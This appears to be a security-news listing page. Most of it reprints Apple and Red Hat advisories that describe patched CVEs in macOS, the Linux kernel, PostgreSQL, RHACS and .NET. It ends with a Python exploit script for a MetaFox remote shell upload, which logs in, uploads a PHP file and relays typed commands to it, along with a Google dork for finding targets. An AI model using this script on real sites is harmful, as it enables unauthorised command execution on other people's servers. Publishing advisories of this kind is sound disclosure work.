Apple Security Advisory 03-07-2024-4 - macOS Monterey 12.7.4 addresses buffer overflow, bypass, code execution, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4

macOS Monterey 12.7.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214083.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Admin Framework  
Available for: macOS Monterey  
Impact: An app may be able to elevate privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2024-23276: Kirin (@Pwnrin)

Airport  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23227: Brian McNulty

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-23269: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Monterey  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23247: m4yfly with TianGong Team of Legendsec at Qi'anxin Group

CoreCrypto  
Available for: macOS Monterey  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Dock  
Available for: macOS Monterey  
Impact: An app from a standard user account may be able to escalate  
privilege after admin user login  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23244: Csaba Fitzl (@theevilbit) of OffSec

Image Processing  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-23234: Murray Mike

Kerberos v5 PAM module  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-23266: Pedro Tôrres (@t0rr3sp3dr0)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: macOS Monterey  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: macOS Monterey  
Impact: An app may be able to cause a denial-of-service  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-23201: Koh M. Nakagawa of FFRI Security, Inc. and an anonymous  
researcher

MediaRemote  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2023-28826: Meng Zhang (鲸落) of NorthSea

Metal  
Available for: macOS Monterey  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Notes  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23283

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to elevate privileges  
Description: An injection issue was addressed with improved input  
validation.  
CVE-2024-23274: Bohdan Stasiuk (@Bohdan_Stasiuk)  
CVE-2024-23268: Mickey Jin (@patch1t), and Pedro Tôrres (@t0rr3sp3dr0)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to access protected user data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23275: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to bypass certain Privacy preferences  
Description: The issue was addressed with improved checks.  
CVE-2024-23267: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to overwrite arbitrary files  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-23216: Pedro Tôrres (@t0rr3sp3dr0)

SharedFileList  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved file handling.  
CVE-2024-23230: Mickey Jin (@patch1t)

Shortcuts  
Available for: macOS Monterey  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: macOS Monterey  
Impact: Third-party shortcuts may use a legacy action from Automator to  
send events to apps without user consent  
Description: This issue was addressed by adding an additional prompt for  
user consent.  
CVE-2024-23245: an anonymous researcher

Storage Services  
Available for: macOS Monterey  
Impact: A user may gain access to protected parts of the file system  
Description: A logic issue was addressed with improved checks.  
CVE-2024-23272: Mickey Jin (@patch1t)

macOS Monterey 12.7.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqccMACgkQX+5d1TXa  
IvoRPw//aOvhmfw+nqXXgAMv5Ptm8/G29gC7vtiS6WVFJsmUEQA5aM5P8KYRT1VP  
UtxDS0ShqKze958tIsiGpOshP7jildMmv52VKLG3HIV8XTTgiSBmO7ODPheGQaaG  
wgUkoZbue7VRSr9UZEm8qbLPdJpCUIbSWJImRbE6k4+Ap1IqRsYVv01gLN9+Ohhw  
tv6ObXbqeKI7EjRcfxqAG/SdehWg2azogMsdrq+wfpaEZG+Fy6B2NPu8AOcKICRQ  
to8JKPWMvtoGjbns5r8OPd9O29z3icsIB8b3qfQZHTc5i/eWi++VoAhLR2lEq8Ts  
hUPbOyf1AU4BeFKCC2MI060lOwK1WE4LRvD/CWv0g02b+yW9lXQ5xTah4+ycYaEp  
vXbxtlp7Da8s0XTDACFVvfMMN7fi3NIBSjwtz6YnqN6cxVnV/re69UYwuT44aJ4s  
UA5NElkhe7NZJ1+QQ5mSws19+PjP7TZpdeaPxxQfr6JN2Mi0a52tCaCmF0gIZHJj  
/HyjQzJHb40w5e4Vqw2r4GxvgZvjmUiW4pvPXgKD+6Ykp+g4lhHldSSFnDakjSy3  
OUM2idhKAHeHdFSm6UEv4ehhJM660DbDRujaZPpVuSKpcqKS79vcjs/gD/EGt/uG  
rhwMQd321+WzaKcGxu0gbAVRMzAtP/yxMEovCU2zFfh3AxbopDg=  
=KbmJ  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-4

Red Hat Security Advisory 2024-1323-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 7. Issues addressed include out of bounds write and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1323.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kpatch-patch security update  
Advisory ID:        RHSA-2024:1323-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1323  
Issue date:         2024-03-14  
Revision:           03  
CVE Names:          CVE-2022-42896  
====================================================================

Summary: 

An update for kpatch-patch is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)

* kernel: out-of-bounds write in qfq_change_class function (CVE-2023-31436)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-42896

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2147364  
https://bugzilla.redhat.com/show_bug.cgi?id=2192671  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514

Red Hat Security Advisory 2024-1323-03

Red Hat Security Advisory 2024-1321-03 - Updated images are now available for Red Hat Advanced Cluster Security. The updated image includes bug and security fixes. Issues addressed include a remote SQL injection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1321.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ACS 4.3 enhancement and security updateAdvisory ID:        RHSA-2024:1321-03Product:            Red Hat Advanced Cluster Security for KubernetesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1321Issue date:         2024-03-14Revision:           03CVE Names:          CVE-2024-27289====================================================================Summary: Updated images are now available for Red Hat Advanced Cluster Security. Theupdated image includes bug and security fixes.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:This release of RHACS 4.3.5 provides the following bug fix:* Fixed an issue where an upgrade to RHACS 4.3 from a previous version caused the Central component to enter a crash loop.It provides the following security fixes:* pgx: SQL Injection via Protocol Message Size Overflow (CVE-2024-27304)* pgx: SQL Injection via Line Comment Creation (CVE-2024-27289)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2024-27289References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268269https://bugzilla.redhat.com/show_bug.cgi?id=2268465https://issues.redhat.com/browse/ROX-23133

Red Hat Security Advisory 2024-1321-03

Red Hat Security Advisory 2024-1315-03 - An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1315.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:13 security updateAdvisory ID:        RHSA-2024:1315-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1315Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1315-03

Red Hat Security Advisory 2024-1314-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1314.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:1314-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1314Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1314-03

Red Hat Security Advisory 2024-1311-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1311.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 8.0 security updateAdvisory ID:        RHSA-2024:1311-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1311Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1311-03

Red Hat Security Advisory 2024-1310-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1310.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 8.0 security updateAdvisory ID:        RHSA-2024:1310-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1310Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1310-03

Red Hat Security Advisory 2024-1309-03 - An update for.NET 7.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1309.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 7.0 security updateAdvisory ID:        RHSA-2024:1309-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1309Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 7.0 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1309-03

Red Hat Security Advisory 2024-1308-03 - An update for.NET 7.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1308.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 7.0 security updateAdvisory ID:        RHSA-2024:1308-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1308Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2024-21392====================================================================Summary: An update for .NET 7.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21392References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268266

Red Hat Security Advisory 2024-1308-03

MetaFox versions 5.1.8 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport requestsimport sysif len(sys.argv) != 4:   sys.exit("Usage: %s " % sys.argv[0])   requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = json.loads(response.text)if not "access_token" in json_response:   sys.exit("Login failed!")print("Login success! Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": ("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in json_response["data"][0]:   sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded at %s\n" % shell_url)while True:   command = input("$ ")   response = requests.post(shell_url, data={"command": command}, verify=False)   print(response.text)

Tag

#js